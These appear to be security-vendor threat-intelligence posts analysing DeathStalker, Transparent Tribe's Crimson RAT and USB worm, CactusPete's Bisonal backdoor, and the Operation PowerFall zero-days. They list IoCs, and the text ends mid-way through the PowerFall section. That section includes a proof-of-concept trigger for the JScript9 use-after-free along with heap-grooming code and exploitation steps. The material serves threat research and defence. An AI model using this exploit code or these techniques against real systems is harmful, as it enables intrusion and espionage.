  • They obtain C&C information from dead drop resolvers using regular expressions and hardcoded sentences
  • IP addresses are obtained in the form of integers that are then divided by a hardcoded constant before being converted
  • Minor code overlaps between the three malware families could indicate that they’ve been developed by the same team, or inside a group that shares software development practices
  • The three malware families all have screenshot capture capabilities. While not original in itself, this isn’t usually part of the development priorities of such groups and could be indicative of a shared design specification
  • Finally, while we don’t have a lot of information about Janicab’s victimology, Powersing and Evilnum both go after business intelligence, albeit in different industry verticals. Both sets of activities are consistent with the hypothesis that they’re run by a mercenary outfit

While none of these points on their own are sufficient in our eyes to draw a conclusion, we feel that together they allow us to assess with medium confidence that Powersing, Evilnum and Janicab are operated by the same group. Additional data shared with us by industry partners that we can’t disclose at the moment also supports this conclusion.

Victimology

DeathStalker primarily targets private entities in the financial sector, including law offices, wealth consultancy firms, financial technology companies, and so on. In one unique instance, we also observed DeathStalker attacking a diplomatic entity.

We’ve been able to identify Powersing-related activities in Argentina, China, Cyprus, Israel, Lebanon, Switzerland, Taiwan, Turkey, the United Kingdom and the United Arab Emirates. We also located Evilnum victims in Cyprus, India, Lebanon, Russia and the United Arab Emirates.

However, we believe that DeathStalkers chooses its targets purely based on their perceived value, or perhaps following customer requests. In this context, we assess that any company in the financial sector could catch DeathStalker’s attention, no matter its geographic location.

Conclusion

In this blog post, we described a modern infection chain that’s still actively used and developed by a threat actor today. It doesn’t contain any innovative tricks or sophisticated methods, and certain components of the chain may actually appear needlessly convoluted. Yet if the hypothesis is correct that the same group operates Janicab and Powersing, it indicates that they’ve been leveraging the same methodologies since 2012. In the infosec world, it doesn’t get more “tried and true” than this.

Based on the limited technological means either of these toolchains display, we believe they’re good examples of what small groups or even skilled individuals can create. The value we see in publicly releasing information about DeathStalker is to have this threat actor serve as a baseline of what the private sector should be able to defend against. Groups like DeathStalker represent the type of cyberthreat most companies today are likely to face more than state-sponsored APTs. Due to its ongoing operations (DeathStalker notably leveraged COVID-19 for both Janicab and Powersing implant deployment since March 2020) and continuous activity since 2018, we believe that DeathStalker is still developing its toolset, and that we’ll have more to report on in the near future.

We advise defenders to pay close attention to any process creation related to native Windows interpreters for scripting languages, such as powershell.exe and cscript.exe. Wherever possible, these utilities should be made unavailable. We also recommend that future awareness trainings and security product assessments include infection chains based on LNK files.

For more information about both DeathStalker and Evilnum activity, subscribe to our private reporting services: intelreports@kaspersky.com

Indicators of Compromise File hashes D330F1945A39CEB78B716C21B6BE5D82 Malicious LNK D83F933B2A6C307E17438749EDA29F02 Malicious LNK 540BC05130424301A8F0543E0240DF1D Malicious LNK 3B359A0E279C4E8C5B781E0518320B46 Malicious LNK 6F965640BC609F9C5B7FEA181A2A83CA Malicious LNK E1718289718792651FA401C945C17079 Malicious LNK F558E216CD3FB6C23696240A8C6306AC Malicious LNK B38D1C18CBCCDDDBF56FDD28E5E6ECBB Loader Script E132C596857892AC41249B90EA6934C1 PowerSing Stage 1 9A0F56CDACCE40D7039923551EAB241B PowerSing Stage 1 0CEBEB05362C0A5665E7320431CD115A PowerSing Stage 1 C5416D454C4A2926CA6128E895224981 PowerSing Stage 1 DBD966532772DC518D818A3AB6830DA9 PowerSing Stage 1 B7BBA5E70DC7362AA00910443FB6CD58 PowerSing Stage 1 2BE3E8024D5DD4EB9F7ED45E4393992D PowerSing Stage 1 83D5A68BE66A66A5AB27E309D6D6ECD1 PowerSing Stage 1 50D763EFC1BE165B7DB3AB5D00FFACD8 PowerSing Stage 1

 

C&C servers 54.38.192.174 Powersing C&C 91.229.76.17 Powersing C&C 91.229.76.153 Powersing C&C 91.229.77.240 Powersing C&C 91.229.77.120 Powersing C&C 91.229.79.120 Powersing C&C 54.38.192.174 Powersing C&C 105.104.10.115 Powersing C&C
2020. augusztus 20.

Transparent Tribe: Evolution analysis,part 1

Background and key findings

Transparent Tribe, also known as PROJECTM and MYTHIC LEOPARD, is a highly prolific group whose activities can be traced as far back as 2013. Proofpoint published a very good article about them in 2016, and since that day, we have kept an eye on the group. We have periodically reported their activities through our APT threat intelligence reports, and subscribers of that service already know that in the last four years, this APT group has never taken time off. They continue to hit their targets, which typically are Indian military and government personnel.

The TTPs have remained consistent over the years, and the group has constantly used certain tools and created new programs for specific campaigns. Their favorite infection vector is malicious documents with an embedded macro, which seem to be generated with a custom builder.

Their main malware is a custom .NET RAT publicly known as Crimson RAT, but over the years, we also have observed the use of other custom .NET malware and a Python-based RAT known as Peppy.

Over the past year, we have seen this group undergo an evolution, stepping up its activities, starting massive infection campaigns, developing new tools and strengthening their focus on Afghanistan.

The summary of our recent investigations will be described in two blogposts. This first publication will cover the following key points:

  • We discovered the Crimson Server component, the C2 used by Transparent Tribe for managing infected machines and conducting espionage. This tool confirmed most of our observations on Crimson RAT and helped us to understand the attackers’ perspective.
  • Transparent Tribe continues to spread Crimson RAT, infecting a large number of victims in multiple countries, mainly India and Afghanistan.
  • The USBWorm component is real, and it has been detected on hundreds of systems. This is malware whose existence was already speculated about years ago, but as far as we know, it has never been publicly described.

I will be talking more about the TransparentTribe and its tools on GReAT Ideas. Powered by SAS webinar on August 26, you can register for it here: https://kas.pr/1gk9

Crimson Server

Crimson is the main tool used by Transparent Tribe for their espionage activities. The tool is composed of various components, which are used by the attacker for performing multiple activities on infected machines:

  • manage remote filesystems
  • upload or download files
  • capture screenshots
  • perform audio surveillance using microphones
  • record video streams from webcam devices
  • capture screenshots
  • steal files from removable media
  • execute arbitrary commands
  • record keystrokes
  • steal passwords saved in browsers
  • spread across systems by infecting removable media

In the course of our analysis, we spotted a .NET file, identified by our products as Crimson RAT, but a closer look revealed that it was something different: a server-side implant used by the attackers to manage the client components.

We found two different server versions, the one being a version that we named “A”, compiled in 2017, 2018 and 2019, and including a feature for installing the USBWorm component and executing commands on remote machines. The version that we named “B” was compiled in 2018 and again at the end of 2019. The existence of two versions confirms that this software is still under development and the APT group is working to enhance it.

By analysing the .NET binary, we were able to set up a working environment and communicate with samples previously detected on victims’ machines.

Crimson Server version “A” Main panel

The first window is the main panel, which provides a list of infected machines and shows basic information about the victims’ systems.

Server main panel

Geolocation information is retrieved from a legitimate website using a remote IP address as the input. The URL used by the server is:

http://ip-api.com/xml/<ip>

At the top, there is a toolbar that can be used for managing the server or starting some actions on the selected bot. At the bottom, there is an output console with a list of actions performed by the server in the background. It will display, for example, information about received and sent commands.

The server uses an embedded configuration specified inside a class named “settings”.

Example of embedded configuration

The class contains TCP port values, default file names and installation paths used by each malware component. The server does not include any features to build the other components; they need to be manually placed in specific predefined folders. For example, based on the configuration displayed in the picture above, the “msclient” must be placed in “.\tmps\rfaiwaus.exe”.

This leads us to conclude that the resulting server file was generated by another builder, which created the executable files, directories and the other files used by the application.

Bot panel

The main features are accessible from the “bot panel”, an interface with twelve tabs, which can be used to manage a remote system and collect information.

Update module

The first tab is used for checking the client configuration, uploading Crimson components and executing these on remote system.

Update modules tab

The Crimson framework is composed of seven client components:

Thin Client -> a tiny version of the RAT used for recognizing the victim. The “thin” client is the most common one; it is usually dropped during the infection process by which Transparent Tribe is distributed and is most commonly found on OSINT resources. It contains a limited number of features and can typically be used to:

  • collect information about infected system
  • collect screenshots
  • manage the remote filesystem
  • download and upload files
  • get a process list
  • kill a process
  • execute a file

Main Client -> the full-featured RAT. It can handle all “Thin Client” features, but it can also be used to:

  • install the other malware components
  • capture webcam images
  • eavesdrop using a computer microphone
  • send messages to the victim
  • execute commands with COMSPEC and receive the output.

USB Driver -> a USB module component designed for stealing files from removable drives attached to infected systems.

USB Worm -> this is the USBWorm component developed for stealing files from removable drives, spread across systems by infecting removable media, and download and execute the “Thin Client” component from a remote Crimson server.

Pass Logger -> a credential stealer, used for stealing credentials stored in the Chrome, Firefox and Opera browsers.

KeyLogger -> this is simple malware used for recording keystrokes.

Remover -> this cannot be pushed using the “Update module tab”, but it can be uploaded to an infected machine automatically using the “Delete User” button. Unfortunately, we did not acquire that component and we cannot provide a description of it.

Interestingly, Transparent Tribe tries to circumvent certain vendors’ security tools by configuring the Server to prevent installation of some of the malware components, specifically the “USB Driver” and the “Pass Logger”, on systems protected with Kaspersky products. They also prevent installation of the “Pass Logger” on systems protected by ESET.

Snippet of code that prevents installation of certain components on systems protected by Kaspersky products

File Manager & Auto Download tabs

The file manager allows the attacker to explore the remote file system, execute programs, download, upload and delete files.

File manager tab

Most of the buttons are self-explanatory. The most interesting ones are “USB Drive” and “Delete USB”, used for accessing data stolen by the USB Driver and USB Worm components and the “Auto File Download” feature. This feature opens another window, which can also be accessed via the second last tab. It allows the attacker to configure the bot to search files, filter results and upload multiple files.

Auto download tab

Screen and Webcam monitoring tabs

Screen monitoring tab

Webcam monitoring tab

These tabs are used for managing two simple and powerful features. The first one is designed for monitoring the remote screen and checking what the user is doing on their system. The second one can be used for spying on a remote webcam and performing video surveillance. The attacker can retrieve a single screenshot or start a loop that forces the bot to continuously send screenshots to the server, generating a live stream of sorts. The attacker can also configure the RAT component to record the images on the remote system.

Other tabs

The other tabs are used for managing the following features:

  • Audio surveillance: The malware uses the NAudio library to interact with the microphone and manage the audio stream. The library is stored server-side and pushed to the victim’s machine using a special command.
  • Send message: The attacker can send messages to victims. The bot will display the messages using a standard message box.
  • Keylogger: Collects keyboard data. The log includes the process name used by the victim, and keystrokes. The attacker can save the data or clear the remote cache.
  • Password Logger: The malware includes a feature to steal browser credentials. The theft is performed by a specific component that enumerates credentials saved in various browsers. For each entry, it saves the website URL, the username and the password.
  • Process manager: The attacker can obtain a list of running processes and terminate these by using a specific button.
  • Command execution: This tab allows the attacker to execute arbitrary commands on the remote machine.
Crimson Server version “B”

The other version is quite similar to the previous one. Most noticeably, in this “B” version, the graphical user interface is different.

Main toolbar version B

“Update USB Worm” is missing from the Update Bot tab, which means that the USB Worm feature is not available in these versions.

Update modules tab, version B

This version does not include the check that prevents installation of certain components on systems protected with Kaspersky products, and the Command execution tab is missing. At the same position, we find a different tab, used for saving comments about the infected machine.

Notes

USBWorm

Last January, we started investigating an ongoing campaign launched by Transparent Tribe to distribute the Crimson malware. The attacks started with malicious Microsoft Office documents, which were sent to victims using spear-phishing emails.

Decoy document used in an attack against Indian entities

The documents typically have malicious VBA code embedded, and sometimes protected with a password, configured to drop an encoded ZIP file which contains a malicious payload.

User form with encoded payloads

The macro drops the ZIP file into a new directory created under %ALLUSERPROFILE% and extracts the archive contents at the same location. The directory name can be different, depending on the sample:

  • %ALLUSERSPROFILE%\Media-List\tbvrarthsa.zip
  • %ALLUSERSPROFILE%\Media-List\tbvrarthsa.exe

Snippet of VBA code

The executable file is the Crimson “Thin Client”, which allows the attacker to gain basic information about the infected machine, collect screenshots, manipulate the file system and download or upload arbitrary files.

During our analysis, we noticed an interesting sample connected to a Crimson C2 server. This sample was related to multiple detections, all of these having different file names and most of them generated from removable devices.

One of the file path name combinations observed was ‘C:\ProgramData\Dacr\macrse.exe’, also configured in a Crimson “Main Client” sample and used for saving the payload received from the C2 when invoking the usbwrm command.

USBWorm file construction function

We concluded that this sample was the USBWorm component mentioned by Proofpoint in its analysis of the malware.

Based on previous research, we knew that this RAT was able to deploy a module to infect USB devices, but as far as we know, it had never been publicly described.

USB Worm description

Our analysis has revealed that USBWorm is much more than a USB infector. In fact, it can be used by the attacker to:

  • download and execute the Crimson “Thin Client”
  • infect removable devices with a copy of USBWorm itself
  • steal files of interest from removable devices (i.e. USB Stealer)

By default, the program behaves as a downloader, infector and USB stealer. Usually, the component is installed by the Crimson “Main Client”, and when started, it checks if its execution path is the one specified in the embedded configuration and if the system is already infected with a Crimson client component. If these conditions are met, it will start to monitor removable media, and for each of these, the malware will try to infect the device and steal files of interest.

The infection procedure lists all directories. Then, for each directory, it creates a copy of itself in the drive root directory using the same directory name and changing the directory attribute to “hidden”. This results in all the actual directories being hidden and replaced with a copy of the malware using the same directory name.

Moreover, USBWorm uses an icon that mimics a Windows directory, tricking the user into executing the malware when trying to access a directory.

USBWorm icon

This simple trick works very well on default Microsoft Windows installations, where file extensions are hidden and hidden files are not visible. The victim will execute the worm every time he tries to access a directory. Moreover, the malware does not delete the real directories and executes “explorer.exe” when started, providing the hidden directory path as argument. The command will open the Explorer window as expected by the user.

View of infected removable media with default Windows settings

View of infected removable media with visible hidden files and file extensions

The data theft procedure lists all files stored on the device and copies those with an extension matching a predefined list:

File extensions of interest: .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt

If the file is of interest, i.e. if the file extension is on the predefined list, the procedure checks if a file with the same name already has been stolen. The malware has a text file with a list of stolen files, which is stored in the malware directory under a name specified in the embedded configuration.

Of course, this approach is a little buggy, because if the worm finds two different files with the same name, it will steal only the first one. Anyway, if the file is of interest and is not on the list of stolen files, it will be copied from the USB to a local directory usually named “data” or “udata”, although the name could be different.

If the worm is executed from removable media, the behavior is different. In this case, it will check if the “Thin Client” or the “Main Client” is running on the system. If the system is not infected, it will connect to a remote Crimson Server and try to use a specific “USBW” command to download and execute the “Thin Client” component.

Snippet of code used to build USBW request

The persistence is guaranteed by a method that is called when the program is closing. It checks if the malware directory exists as specified in an embedded configuration and then copies the malware executable inside it. It also creates a registry key under “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” to execute the worm automatically.

USB Worm distribution

During our investigation, we found around two hundred distinct samples related to Transparent Tribe Crimson components. We used the Kaspersky Security Network (KSN) to collect some statistics about the victims.

Considering all components detected between June 2019 and June 2020, we found more than one thousand distinct victims distributed across twenty-seven countries.

Crimson distribution map

Most of the detections were related to the USB Worm components; and in most of the countries, the number of events was very low.

Crimson detections – USBWorm vs other components

If we check victims compromised with the other client components, we can find the real targets.

Top five infected countries from June 2019 to June 2020 – USBWorm excluded

The graph includes the highest number of distinct victims, and it shows that Transparent Tribe maintained a strong focus on Afghanistan during the final part of 2019 and then started to focus again on Indian users during 2020.

We may speculate that detections in other countries may be related to entities related to main targets, such as personnel of embassies.

Conclusions

Transparent Tribe continues to show high activity against multiple targets. In the last twelve months, we observed a broad campaign against military and diplomatic targets, using extensive infrastructure to support their operations and continuous improvements in their arsenal. The group continue to invest in their main RAT, Crimson, to perform intelligence activities and spy on sensitive targets. We do not expect any slowdown from this group in the near future and we will continue to monitor their activities.

IoC

The followings IOC list is not complete. If you want more information about the APT discussed here, as well as a full IOC list, and YARA rules are available to customers of Kaspersky Threat Intelligence Reports. Contact: intelreports@kaspersky.com

5158C5C17862225A86C8A4F36F054AE2 – Excel document – NHQ_Notice_File.xls
D2C407C07CB5DC103CD112804455C0DE – Zip archive – tbvrarthsa.zip
76CA942050A9AA7E676A8D553AEB1F37 – Zip archive – ulhtagnias.zip

08745568FE3BC42564A9FABD2A9D189F – Crimson Server Version “A”
03DCD4A7B5FC1BAEE75F9421DC8D876F – Crimson Server Version “B”
075A74BA1D3A5A693EE5E3DD931E1B56 – Crimson Keylogger
1CD5C260ED50F402646F88C1414ADB16 – Crimson Keylogger
CAC1FFC1A967CD428859BB8BE2E73C22 – Crimson Thin Client
E7B32B1145EC9E2D55FDB1113F7EEE87 – Crimson Thin Client
F5375CBC0E6E8BF10E1B8012E943FED5 – Crimson Main Client
4B733E7A78EBD2F7E5306F39704A86FD – Crimson Main Client
140D0169E302F5B5FB4BB3633D09B48F – Crimson USB Driver
9DD4A62FE9513E925EF6B6D795B85806 – Crimson USB Driver
1ED98F70F618097B06E6714269E2A76F – Crimson USB Worm
F219B1CDE498F0A02315F69587960A18 – Crimson USB Worm

64.188.25.206 – Crimson C2
173.212.192.229 – Crimson C2
45.77.246.69 – Crimson C2
newsbizupdates.net – Crimson C2
173.249.22.30 – Crimson C2
uronlinestores.net – Crimson C2

2020. augusztus 13.

CactusPete APT group’s updated Bisonal backdoor

CactusPete (also known as Karma Panda or Tonto Team) is an APT group that has been publicly known since at least 2013. Some of the group’s activities have been previously described in public by multiple sources. We have been investigating and privately reporting on this group’s activity for years as well. Historically, their activity has been focused on military, diplomatic and infrastructure targets in Asia and Eastern Europe.

This is also true of the group’s latest activities.

A new CactusPete campaign, spotted at the end of February 2020 by Kaspersky, shows that the group’s favored types of target remain the same. The victims of the new variant of the Bisonal backdoor, according to our telemetry, were from financial and military sectors located in Eastern Europe. Our research started from only one sample, but by using the Kaspersky Threat Attribution Engine (KTAE) we found 300+ almost identical samples. All of them appeared between March 2019 and April 2020. This underlines the speed of CactusPete’s development – more than 20 samples per month. The target location forced the group to use a hardcoded Cyrillic codepage during string manipulations. This is important, for example, during remote shell functionality, to correctly handle the Cyrillic output from executed commands.

The method of malware distribution for the new campaign remains unknown, but previous campaigns indicate that it’s their usual way of distributing malware. The attackers’ preferred way to deliver malware is spear-phishing messages with “magic” attachments. The attachments never contain zero-day exploits, but they do include recently discovered and patched vulnerabilities, or any other crafty approaches that might help them deliver the payload. Running these attachments leads to infection.

Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample. As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification.

http://C2_DOMAIN_IP/chapter1/user.html/BASE64_RC4_ENCRYPTED_BODY

The handshake consists of several steps: initial request, victim network details and a more detailed victim information request. This is the complete list of victim specific information that is sent to the C2 during the handshake steps:

  • Hostname, IP and MAC address;
  • Windows version;
  • Time set on infected host;
  • Flags that indicates if the malware was executed on VMware environment;
  • Proxy usage flag;
  • System default CodePage Identifier;

After the handshake has been completed, the backdoor waits for a command, periodically pinging the C2 server. The response body from the C2 ping might hold the command and parameters (optionally). The updated Bisonal backdoor version maintains functionality similar to past backdoors built from the same codebase:

  • Execute a remote shell;
  • Silently start a program on a victim host;
  • Retrieve a list of processes from the victim host;
  • Terminate any process;
  • Upload/Download/Delete files to/from victim host;
  • Retrieve a list of available drives from the victim host;
  • Retrieve a filelist of a specified folder from the victim host;

This is what it looks like in code.

 Screenshot of the C2 command handling subroutine

This set of remote commands helps the attackers study the victim environment for lateral movement and deeper access to the target organization. The group continues to push various custom Mimikatz variants and keyloggers for credential harvesting purposes, along with privilege escalation malware.

What are they looking for?

Since the malware contains mostly information gathering functionality, most likely they hack into organizations to gain access to the victims’ sensitive data. If we recall that CactusPete targets military, diplomatic and infrastructure organizations, the information could be very sensitive indeed.

We would suggest the following countermeasures to prevent such threats:

  • Network monitoring, including unusual behavior detection;
  • Up-to-date software to prevent exploitation of vulnerabilities;
  • Up-to-date antivirus solutions;
  • Training employees to recognize email-based (social engineering) attacks;
CactusPete activity

CactusPete is a Chinese-speaking cyber-espionage APT group that uses medium-level technical capabilities, and the people behind it have upped their game. They appear to have received support and have access to more complex code like ShadowPad, which CactusPete deployed in 2020. The group’s activity has been recorded since at least 2013, although Korean public resources mark an even earlier date – 2009. Historically, CactusPete targets organizations within a limited range of countries – South Korea, Japan, the US and Taiwan. Last year’s campaigns show that the group has shifted towards other Asian and Eastern European organizations.

Here’s an overview of CactusPete activity in recent years, based on Kaspersky research results:

  • May 2018: a new wave of targeted attacks abusing CVE-2018-8174 (this exploit has been associated with the DarkHotel APT group, as described on Securelist), with diplomatic, defense, manufacturing, military and government targets in Asia and Eastern Europe;
  • December 2018 and early 2019: Bisonal backdoor modification with a set of spying payloads in a campaign targeting organizations within mining, defense, government and technology research targets in Eastern Europe and Asia;
  • September and October 2019: a DoubleT backdoor campaign, targeting military-related and unknown victims;
  • March 2019 to April 2020: Bisonal backdoor modification in a campaign targeting organizations in financial and military institutions in Eastern Europe;
  • December 2019 to April 2020: a modified DoubleT backdoor campaign, targeting telecom and governmental organizations and other victims in Asia and Eastern Europe;
  • Late 2019 and 2020: CactusPete started to deploy ShadowPad malware with victims including government organizations, energy, mining, and defense bodies and telcoms located in Asia and Eastern Europe;

Known alternative names for this APT group:
CactusPete, Karma Panda, Tonto Team

Known alternative names for the different payloads used:
Bisonal, Curious Korlia, DoubleT, DOUBLEPIPE, CALMTHORNE

In the end…

We call CatusPete an Advanced Persistent Threat (APT) group, but the Bisonal code we analyzed is not that advanced. Yet, interestingly, the CactusPete APT group has had success without advanced techniques, using plain code without complicated obfuscation and spear-phishing messages with “magic” attachments as the preferred method of distribution. Of course, the group does continuously modify the payload code, studies the suggested victim in order to craft a trustworthy phishing email, sends it to an existing email address in the targeted company and makes use of new vulnerabilities and other methods to inconspicuously deliver the payload once an attachment has been opened. The infection occurs, not because of advanced technologies used during the attack, but because of those who view the phishing emails and open the attachments. Companies need to conduct spear-phishing awareness training for employees in order to improve their computer security knowledge.

IoCs

PDB path:
E:\vs2010\new big!\MyServe\Debug\MyServe.pdb

MD5:
A3F6818CE791A836F54708F5FB9935F3
3E431E5CF4DA9CAE83C467BC1AE818A0
11B8016045A861BE0518C9C398A79573

Related material:

2020. augusztus 12.

Internet Explorer and Windows zero-day exploits used in Operation PowerFall

Executive summary

In May 2020, Kaspersky technologies prevented an attack on a South Korean company by a malicious script for Internet Explorer. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium, the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64.

On June 8, 2020, we reported our discoveries to Microsoft, and the company confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day elevation of privilege exploit, but before our discovery, the exploitability of this vulnerability was considered less likely. The patch for CVE-2020-0986 was released on June 9, 2020.

Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch was released on August 11, 2020.

We are calling this and related attacks ‘Operation PowerFall’. Currently, we are unable to establish a definitive link with any known threat actors, but due to similarities with previously discovered exploits, we believe that DarkHotel may be behind this attack. Kaspersky products detect Operation PowerFall attacks with verdict PDM:Exploit.Win32.Generic.

Internet Explorer 11 remote code execution exploit

The most recent zero-day exploits for Internet Explorer discovered in the wild relied on the vulnerabilities CVE-2020-0674, CVE-2019-1429, CVE-2019-0676 and CVE-2018-8653 in the legacy JavaScript engine jscript.dll. In contrast, CVE-2020-1380 is a vulnerability in jscript9.dll, which has been used by default starting with Internet Explorer 9, and because of this, the mitigation steps recommended by Microsoft (restricting the usage of jscript.dll) cannot protect against this particular vulnerability.

CVE-2020-1380 is a Use-After-Free vulnerability that is caused by JIT optimization and the lack of necessary checks in just-in-time compiled code. A proof-of-concept (PoC) that triggers vulnerability is demonstrated below:

function func(O, A, F, O2) { arguments.push = Array.prototype.push; O = 1; arguments.length = 0; arguments.push(O2); if (F == 1) { O = 2; } // execute abp.valueOf() and write by dangling pointer A[5] = O; }; // prepare objects var an = new ArrayBuffer(0x8c); var fa = new Float32Array(an); // compile func func(1, fa, 1, {}); for (var i = 0; i < 0x10000; i++) { func(1, fa, 1, 1); } var abp = {}; abp.valueOf = function() { // free worker = new Worker('worker.js'); worker.postMessage(an, [an]); worker.terminate(); worker = null; // sleep var start = Date.now(); while (Date.now() - start < 200) {} // TODO: reclaim freed memory return 0 }; try { func(1, fa, 0, abp); } catch (e) { reload() }

To understand this vulnerability, let us take a look at how func() is executed. It is important to understand what value is set to A[5]. According to the code, it should be an O argument. At function start, the O argument is re-assigned to 1, but then the function arguments length is set to 0. This operation does not clear function arguments (as it would normally do with regular array) but allows to put argument O2 into the arguments list at index zero using Array.prototype.push, meaning O = O2 now. Besides that, if the argument F is equal to 1, then O will be re-assigned once again, but to the integer number 2. It means that depending on the value of the F argument, the O argument is equal to either the value of the O2 argument or the integer number 2. The argument A is a typed array of 32-bit floating point numbers, and before assigning a value to index 5 of the array, this value should be converted to a float. Converting an integer to a float is a relatively simple task, but it become less straightforward when an object is converted to a float number. The exploit uses the object abp with an overridden valueOf() method. This method is executed when the object is converted to a float, but inside the method there is code that frees ArrayBuffer, which is viewed by Float32Array and where the returned value will be set. To prevent the value from being stored in the memory of the freed object, the JavaScript engine needs to check the status of the object before storing the value in it. To convert and store the float value safely, JScript9.dll uses the function Js::TypedArray<float,0>::BaseTypedDirectSetItem(). You can see decompiled code of this function below:

int Js::TypedArray<float,0>::BaseTypedDirectSetItem(Js::TypedArray<float,0> *this, unsigned int index, void *object, int reserved) { Js::JavascriptConversion::ToNumber(object, this->type->library->context); if ( LOBYTE(this->view[0]->unusable) ) Js::JavascriptError::ThrowTypeError(this->type->library->context, 0x800A15E4, 0); if ( index < this->count ) { *(float *)&this->buffer[4 * index] = Js::JavascriptConversion::ToNumber( object, this->type->library->context); } return 1; } double Js::JavascriptConversion::ToNumber(void *object, struct Js::ScriptContext *context) { if ( (unsigned char)object & 1 ) return (double)((int)object >> 1); if ( *(void **)object == VirtualTableInfo<Js::JavascriptNumber>::Address[0] ) return *((double *)object + 1); return Js::JavascriptConversion::ToNumber_Full(object, context); }

This function checks the view[0]->unusable and count fields of the typed float array and when ArrayBuffer is freed during execution of the valueOf() method, both of these checks will fail because view[0]->unusable will be set to 1 and count will be set to 0 during the first call to Js::JavascriptConversion::ToNumber(). The problem lies in the fact that the function Js::TypedArray<float,0>::BaseTypedDirectSetItem() is used only in interpretation mode.

When the function func() is compiled just in time, the JavaScript engine will use the vulnerable code below.

if ( !((unsigned char)floatArray & 1) && *(void *)floatArray == &Js::TypedArray<float,0>::vftable ) { if ( floatArray->count > index ) { buffer = floatArray->buffer + 4*index; if ( object & 1 ) { *(float *)buffer = (double)(object >> 1); } else { if ( *(void *)object != &Js::JavascriptNumber::vftable ) { Js::JavascriptConversion::ToFloat_Helper(object, (float *)buffer, context); } else { *(float *)buffer = *(double *)(object->value); } } } }

And here is the code of the Js::JavascriptConversion::ToFloat_Helper() function.

void Js::JavascriptConversion::ToFloat_Helper(void *object, float *buffer, struct Js::ScriptContext *context) { *buffer = Js::JavascriptConversion::ToNumber_Full(object, context); }

As you can see, unlike in interpretation mode, in just-in-time compiled code, the life cycle of ArrayBuffer is not checked, and its memory can be freed and then reclaimed during a call to the valueOf() function. Additionally, the attacker can control at what index the returned value is written. However, in the case when “arguments.length = 0;”and “arguments.push(O2);” are replaced in PoC with “arguments[0] = O2;” then Js::JavascriptConversion::ToFloat_Helper() will not trigger the bug because implicit calls will be disabled and it will not perform a call to the valueOf() function.

To ensure that the function func() is compiled just in time, the exploit executes this function 0x10000 times, performing a harmless conversion of the integer, and only after that func() is executed once more, triggering the bug. To free ArrayBuffer, the exploit uses a common technique abusing the Web Workers API. The function postMessage() can be used to serialize objects to messages and send them to the worker. As a side effect, transferred objects are freed and become unusable in the current script context. When ArrayBuffer is freed, the exploit triggers garbage collection via code that simulates the use of the Sleep() function: it is a while loop that checks for the time lapse between Date.now() and the previously stored value. After that, the exploit reclaims the memory with integer arrays.

for (var i = 0; i < T.length; i += 1) { T[i] = new Array((0x1000 - 0x20) / 4); T[i][0] = 0x666; // item needs to be set to allocate LargeHeapBucket }

When a large number of arrays is created, Internet Explorer allocates new LargeHeapBlock objects, which are used by IE’s custom heap implementation. The LargeHeapBlock objects will store the addresses of buffers allocated for the arrays. If the expected memory layout is achieved successfully, the vulnerability will overwrite the value at the offset 0x14 of LargeHeapBlock with 0, which happens to be the allocated block count.

LargeHeapBlock structure for jscript9.dll x86

 After that, the exploit allocates a huge number of arrays and sets them to another array that was prepared at the initial stage of the exploitation. Then this array is set to null, and the exploit makes a call to the CollectGarbage() function. This results in defragmentation of the heap, and the modified LargeHeapBlock will be freed along with its associated array buffers. At this stage, the exploit creates a large amount of integer arrays in hopes of reclaiming the previously freed array buffers. The newly created arrays have a magic value set at index zero, and this value is checked through a dangling pointer to the previously freed array to detect if the exploitation was successful.

for (var i = 0; i < K.length; i += 1) { K[i] = new Array((0x1000 - 0x20) / 4); K[i][0] = 0x888; // store magic } for (var i = 0; i < T.length; i += 1) { if (T[i][0] == 0x888) { // find array accessible through dangling pointer R = T[i]; break; } }

As a result, the exploit creates two different JavascriptNativeIntArray objects with buffers pointing to the same location. This makes it possible to retrieve the addresses of the objects and even create new malformed objects. The exploit takes advantage of these primitives to create a malformed DataView object and get read/write access to the whole address space of the process.

After the building of the arbitrary read/write primitives, it is time to bypass Control Flow Guard (CFG) and get code execution. The exploit uses the Array’s vftable pointer to get the module base address of jscript9.dll. From there, it parses the PE header of jscript9.dll to get the address of the Import Directory Table and resolves the base addresses of the other modules. The goal here is to find the address of the function VirtualProtect(), which will be used to make the shellcode executable. After that, the exploit searches for two signatures in jscript9.dll. Those signatures correspond to the address of the Unicode string “split” and the address of the function: JsUtil::DoublyLinkedListElement<ThreadContext>::LinkToBeginning<ThreadContext>(). The address of the Unicode string “split” is used to get a code reference to the string and with its help, to resolve the address of the function Js::JavascriptString::EntrySplit(), which implements the string method split(). The address of the function LinkToBeginning<ThreadContext>() is used to obtain the address of the first ThreadContext object in the global linked list. The exploit locates the last entry in the linked list and uses it to get the location of the stack for the thread responsible for the execution of the script. After that comes the final stage. The exploit executes the split() method and an object with an overridden valueOf() method is provided as a limit argument. When the overridden valueOf() method is executed during the execution of the function Js::JavascriptString::EntrySplit(), the exploit will search the thread’s stack to find the return address, place the shellcode in a prepared buffer, obtain its address, and finally build a return-oriented programming (ROP) chain to execute the shellcode by overwriting the return address of the function.

Next stage

The shellcode is a reflective DLL loader for the portable executable (PE) module that is appended to the shellcode. The module is very small in size, and the whole functionality is located inside a single function. It creates a file within a temporary folder with the name ok.exe and writes to it the contents of another executable that is present in the remote code execution exploit. After that, ok.exe is executed.

The ok.exe executable contains is an elevation of privilege exploit for the arbitrary pointer dereference vulnerability CVE-2020-0986 in the GDI Print / Print Spooler API. Initially, this vulnerability was reported to Microsoft by an anonymous user working with Trend Micro’s Zero Day Initiative back in December 2019. Due to the patch not being released for six months since the original report, ZDI posted a public advisory for this vulnerability as a zero-day on May 19, 2020. The next day, the vulnerability was exploited in the previously mentioned attack.

